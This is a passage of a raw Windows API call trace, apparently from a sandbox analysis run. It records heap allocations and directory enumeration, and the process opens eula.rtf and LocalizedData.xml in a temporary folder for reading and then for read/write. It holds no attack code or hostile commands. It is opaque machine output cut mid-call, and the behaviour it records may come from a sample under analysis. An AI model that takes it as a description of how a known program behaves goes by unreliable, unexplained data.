InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.669] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.669] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0060.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0060.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0060.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0060.669] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="1035", cAlternateFileName="")) returned 1 [0060.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0060.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0060.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0060.669] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1033\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78f10 [0060.670] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.670] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd723cc00, ftCreationTime.dwHighDateTime=0x1cabb47, ftLastAccessTime.dwLowDateTime=0xd723cc00, ftLastAccessTime.dwHighDateTime=0x1cabb47, ftLastWriteTime.dwLowDateTime=0xd723cc00, ftLastWriteTime.dwHighDateTime=0x1cabb47, nFileSizeHigh=0x0, nFileSizeLow=0xc74, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0060.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0060.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0060.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0060.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0060.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0060.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0060.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46898 [0060.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0060.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0060.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0060.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0060.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0060.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0060.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0060.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71960 [0060.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0060.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0060.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0060.671] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.671] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.671] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.671] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0060.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0060.671] AreFileApisANSI () returned 1 [0060.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1033\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1033\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0060.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.671] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.671] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0060.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0060.671] AreFileApisANSI () returned 1 [0060.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69170 [0060.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x69170, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 36 [0060.672] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.672] GetFileType (hFile=0x420) returned 0x1 [0060.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0060.672] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.672] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.672] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.672] CloseHandle (hObject=0x420) returned 1 [0060.673] AreFileApisANSI () returned 1 [0060.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0060.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 36 [0060.673] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.673] GetFileType (hFile=0x420) returned 0x1 [0060.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0060.673] CloseHandle (hObject=0x420) returned 1 [0060.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0060.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0060.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0060.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0060.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0060.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0060.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0060.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0060.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0060.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0060.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0060.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0060.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0060.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0060.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0060.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0060.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0060.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.674] AreFileApisANSI () returned 1 [0060.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68b80 [0060.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x68b80, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 36 [0060.674] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd723cc00, ftCreationTime.dwHighDateTime=0x1cabb47, ftLastAccessTime.dwLowDateTime=0xd723cc00, ftLastAccessTime.dwHighDateTime=0x1cabb47, ftLastWriteTime.dwLowDateTime=0xd723cc00, ftLastWriteTime.dwHighDateTime=0x1cabb47, nFileSizeHigh=0x0, nFileSizeLow=0xc74)) returned 1 [0060.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0060.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0060.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0060.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.674] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x47ad1a00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x47ad1a00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x47ad1a00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12db0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0060.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0060.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0060.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0060.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0060.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0060.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0060.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0060.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0060.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0060.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0060.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0060.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0060.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0060.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0060.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0060.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0060.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0060.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0060.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0060.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0060.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0060.675] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.675] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.675] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.675] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0060.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0060.675] AreFileApisANSI () returned 1 [0060.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0060.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0060.675] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.675] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0060.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0060.675] AreFileApisANSI () returned 1 [0060.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71758 [0060.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 45 [0060.676] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.676] GetFileType (hFile=0x420) returned 0x1 [0060.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0060.676] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.676] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.677] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.677] CloseHandle (hObject=0x420) returned 1 [0060.677] AreFileApisANSI () returned 1 [0060.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0060.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 45 [0060.677] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.677] GetFileType (hFile=0x420) returned 0x1 [0060.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0060.677] CloseHandle (hObject=0x420) returned 1 [0060.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0060.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0060.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0060.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0060.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0060.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0060.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0060.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0060.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0060.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0060.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0060.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0060.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0060.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0060.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0060.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0060.678] HeapFree (in: hHeap=0x20000, 